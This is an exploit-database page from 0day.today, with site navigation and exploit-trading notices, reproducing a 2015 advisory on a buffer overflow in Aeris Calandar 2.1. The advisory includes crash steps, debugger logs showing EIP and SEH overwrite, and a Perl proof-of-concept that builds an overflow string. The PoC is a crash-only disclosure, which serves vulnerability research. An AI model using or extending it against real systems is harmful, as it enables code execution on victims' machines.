0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Aeris Calandar 2.1 - Buffer Overflow Vulnerability
[- Title : Aeris Calandar 2.1 - Buffer Overflow Vulnerability - Author : ZwX - Date : 27/11/2015 - Software Link : http://www.esumsoft.com/download/?prod=aeriscalendar - Vendor : http://www.esumsoft.com/ - Tested On : Windows 7 & Windows XP SP3 =============================== * Description Vulnerability : * =============================== A typical buffer overflow vulnerability is located in the software Aeris CaLandar an attacker manipulate the bit EIP register in order to execute the next instruction of their choice. Example: execute the arbitrary code. ================================================= * Manual steps to reproduce the vulnerability : * ================================================= 1. Launch Aeris Calandar.exe 2. Click Weather -> Set Location 3. Copy the AAAA...string from bof.txt to clipboard 4. Paste it the input Enter your city or zip code and press search AAAA....string click Search 5. Software will Crash ================================= * Debug Session Logs [WINDGB] : * ================================= Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=43434343 edx=77ce72cd esi=00000000 edi=00000000 eip=43434343 esp=0012cbe8 ebp=0012cc08 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 43434343 ?? ??? 0:000> !exchain 0012cbfc: ntdll!RtlRaiseStatus+c8 (77ce72cd) 0012cfe4: ntdll!RtlRaiseStatus+c8 (77ce72cd) 0012f404: 43434343 Invalid exception stack at 42424242 0:000> d 0012f404 0012f404 42 42 42 42 43 43 43 43-00 00 00 00 80 32 44 00 BBBBCCCC.....2D. <== Control Register EIP 0012f414 a0 e6 1e 0b 01 00 00 00-08 be 51 00 60 f5 12 00 ..........Q.`... 0012f424 11 01 00 00 dd 92 38 00-fe ff ff ff c3 60 cf 77 ......8......`.w 0012f434 d0 5d cf 77 10 00 00 00-00 00 00 00 00 00 00 00 .].w............ 0012f444 00 00 22 00 00 00 00 00-00 00 00 00 f4 f4 12 00 .."............. 0012f454 00 04 00 00 c0 01 05 00-f4 f4 12 00 00 00 00 00 ................ 0012f464 fe ff ff ff fe c5 7f 77-94 52 7f 77 04 00 00 00 .......w.R.w.... 0012f474 f2 64 4e 00 72 01 04 00-e7 c4 7f 77 c0 01 05 00 .dN.r......w.... =========================== * Proof Of Concept Perl : * =========================== my $Buff = "\x41" x 8186; my $Buff1 = "\x42" x 4; my $Buff2 = "\x43" x 4; open(MYFILE,'>>File.txt'); print MYFILE $Buff.$Buff1.$Buff2; close(MYFILE); print " POC Created by ZwX\n"; # 0day.today [2025-01-06] #